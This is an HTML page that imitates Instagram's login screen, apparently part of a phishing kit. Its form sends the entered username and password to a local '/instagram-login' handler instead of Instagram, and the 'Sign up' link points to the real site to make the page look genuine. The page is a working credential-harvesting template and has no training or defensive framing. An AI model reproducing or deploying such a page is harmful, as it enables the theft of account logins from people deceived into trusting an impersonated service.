<!DOCTYPE html>
<html>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta http-equiv="X-UA-Compatible" content="ie=edge">
	<link rel="stylesheet" href="/static/css/instagram.css">
	<body>
		<div class="container">
			<img src="../static/images/instagram/text.png"/>
            <div>
			<form method="post" action="/instagram-login">
		<input type="text" placeholder="Phone number, username, or email" name="username"></input><br>
		<input type="password" placeholder="Password" name="password"></input><br>
		<p id="p1">Forgot password?</p>
		<button type="submit">Log In</button>
		<p id="p2">Don't have an account? <a href="https://www.instagram.com">Sign up</a></p>
		</form>
    </div>
	</div>
</body>
</html>